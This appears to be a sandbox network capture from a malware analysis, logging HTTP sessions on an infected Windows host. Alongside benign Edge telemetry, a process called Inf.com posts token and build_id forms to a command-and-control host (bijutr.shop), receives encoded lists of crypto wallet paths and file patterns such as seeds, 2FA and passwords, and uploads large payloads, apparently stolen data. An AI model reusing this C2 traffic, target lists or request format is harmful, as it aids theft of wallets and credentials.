Date: Fri, 27 Dec 2024 06:01:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50015 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:42 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----S26PZCJEC2V37YCBAIMG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:01:42 UTC | 331 | OUT | Data Ascii:
------S26PZCJEC2V37YCBAIMG
Content-Disposition: form-data; name="token"

a9d26c542187b1bd8ffa28120f0b3b8a
------S26PZCJEC2V37YCBAIMG
Content-Disposition: form-data; name="build_id"

7860569445207f1198f3127a2e0d4a29
------S26PZCJEC2V37YCBAIMG
Cont
2024-12-27 06:01:44 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:01:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:01:44 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50021 | 13.89.178.27 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:44 UTC | 1071 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279301810&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 11955
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-27 06:01:44 UTC | 11955 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:01:41.808Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"locale
2024-12-27 06:01:45 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=c52f557d03aa48ebae1e0e6695c37953&HASH=c52f&LV=202412&V=4&LU=1735279304731; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:44 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=764f741611a448418ab49609e1f6a652; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:44 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2921
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 27 Dec 2024 06:01:44 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50022 | 13.89.178.27 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:44 UTC | 1070 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279301815&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5220
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-27 06:01:44 UTC | 5220 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:01:41.812Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"locale
2024-12-27 06:01:45 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=339b976c6c364b48b456e4050c72f59e&HASH=339b&LV=202412&V=4&LU=1735279304817; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=d32727faf39441978dd2f5ae6def7ccb; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 3002
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:44 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50023 | 13.89.178.27 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:45 UTC | 1070 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279302807&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 9668
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-27 06:01:45 UTC | 9668 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T06:01:42.806Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"loc
2024-12-27 06:01:46 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=8b4d5df696454f4eb312c2b6aaddd205&HASH=8b4d&LV=202412&V=4&LU=1735279305862; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:45 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=5f9111643061488abbf91d4314f5eed7; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:45 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 3055
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:45 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50024 | 13.89.178.27 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:45 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279302977&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 5446
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-27 06:01:45 UTC | 5446 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:01:42.976Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"locale
2024-12-27 06:01:46 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=97709b01ebd5422fa6fac08d66cb2a91&HASH=9770&LV=202412&V=4&LU=1735279305968; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:45 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=22180eb56e4d4903b3e6b11d4a1f1afe; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:45 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2991
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:45 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50026 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:45 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IMYUKNY5XBIE37Q9R1VS
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:01:45 UTC | 331 | OUT | Data Ascii: ------IMYUKNY5XBIE37Q9R1VSContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------IMYUKNY5XBIE37Q9R1VSContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------IMYUKNY5XBIE37Q9R1VSCont
2024-12-27 06:01:46 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:46 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:01:46 UTC | 2208 | IN | Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50027 | 13.89.178.27 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:46 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279303519&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 5594
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-27 06:01:46 UTC | 5594 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T06:01:43.519Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":6,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"loc
2024-12-27 06:01:46 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=8f6591586c864b30b59bbde5480e1d9d&HASH=8f65&LV=202412&V=4&LU=1735279306442; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=d44a88b21c334abebcc94e1742b99682; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2923
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:46 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50034 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:48 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----58GD2V3OZMO8YMOZCJ5X
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 7009
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:48 UTC7009OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------58GD2V3OZMO8YMOZCJ5XContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------58GD2V3OZMO8YMOZCJ5XContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------58GD2V3OZMO8YMOZCJ5XCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:49 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 50040 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:50 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----USR1N7QIEU37YUAS2V3W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 117961
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:01:50 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74
Data Ascii: ------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------USR1N7QIEU37YUAS2V3WCont
2024-12-27 06:01:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:01:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:01:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  43192.168.2.550050188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
